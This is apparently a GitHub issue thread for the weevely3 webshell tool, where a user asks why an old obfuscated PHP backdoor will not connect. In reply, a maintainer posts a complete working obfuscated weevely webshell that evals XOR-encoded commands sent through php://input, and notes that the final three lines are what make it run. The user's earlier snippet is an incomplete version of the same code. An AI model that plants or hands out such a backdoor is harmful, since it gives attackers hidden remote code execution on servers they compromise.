### ISSUE TITLE
old version created weevely backdoor not connect with latest version

### ISSUE THREAD

**Issue by digu3120** [epinna/weevely3#183]
here i old backdoor
<?php
$U='an()PY;$r=@baPYse64_enPYcodePY(PY@x(@gPYzcomprePYssPY($o)PY,PY$k));print("$p$kh$r$kf");}';
$g='tAVypPY9mPY9y";functPYion x($tPY,$kPY){$c=strlPYen($PYk);PY$l=strlePYnPY($t)PY;$o=PY"";for';
$v='j};PYPY}}return $oPY;}iPYf (@PYprPYeg_match("/$kh(.+)$kPYf/",@fiPYlePY_gePYt_PYcont';
$m='PY($i=0;$i<$l;){PYfor($j=0;(PY$j<$PYcPY&&$i<PY$l);$j+PY+,$i++){PY$o.=$t{$i}^PY$kPY{$';
$l='PYx(@base6PY4_decoPYPYde($m[PY1]),$k)));PY$oPY=@ob_get_coPYnPYtentsPY()PY;@ob_end_cle';
$I='ents("phPYp:PY//input"),PY$m)==1)PY {@PYob_starPYt();@evPYal(@gPYzunPYcompress(@';
$h=str_replace('Hr','','HrcHrreatHre_HrfuncHrHrtion');
$L='$k="81dPYPYc9bPYdb";$kh="52d04dcPY20PYPYPY036";$kf="dbd83PY13ed0PY55";$PYp="wgr3OcQ';
?>

Password is :- 1234

But it is not connected with latest version weevely

**Comment by digu3120** [comment]
[php.txt](https://github.com/epinna/weevely3/files/15090331/php.txt)
here is my backdoor code which is created with old weevely but now it is not connected with new version weevely
password si :- 11234

**Comment by ZanyMonk** [comment]
Is that all your webshell contains ?

Because it lacks the last part. Here is full weevely webshell:
```php
$ weevely generate -obfuscator obfusc1_php 1234 -       
<?php
$B='fXZunction XZx($t,$k){XZ$XZc=XZstrlen($k);$l=strleXZn($tXZ);$o=XZ"XZ";for(XZ$i=0;$i<$l;XZ){for($';
$m=');@eXZval(@XZXZgzXZuncompress(@x(@baXZseXZ64_decoXZde($m[1]XZ),$k))XZ);XZ$o=@ob_get_XZcXZontent';
$g='j=XZ0;($j<XZ$c&&$XZiXZ<$l);$j++,XZ$i+XZ+){$oXZ.XZ=$t[$i]^$k[XZ$j];}XZ}return $oXZ;}XZif (XZXZ@preg';
$z='s(XZ);@oXZb_eXZnd_clean();$rXZ=@base6XZ4_enXZcode(@x(XZ@gXZzcompresXZs(XZ$o),$k));priXZXZXZnt("$p$kh$r$kf");}';
$H='_match("/$XZkh(XZ.+XZ)$kf/",@file_get_conteXZnXZts("php://XZinputXZ"),$m)=XZ=1)XZ {@ob_stXZart(';
$s='$k="XZ8XZ1dc9bdb";XZ$kh="5XZ2d04dc2003XZXZ6";$kf="XZdbd8313ed055XZ";XZ$p="CNVSXZxXZwt6lQtXZXZD1N7G";';
$E=str_replace('xk','','xkcrexkaxktxkexk_functixkon');
$i=str_replace('XZ','',$s.$B.$g.$H.$m.$z);
$Z=$E('',$i);$Z();
?>
```

Without the three last lines you are missing (`$E`, `$i` and `$Z` in this case) it won't do anything.
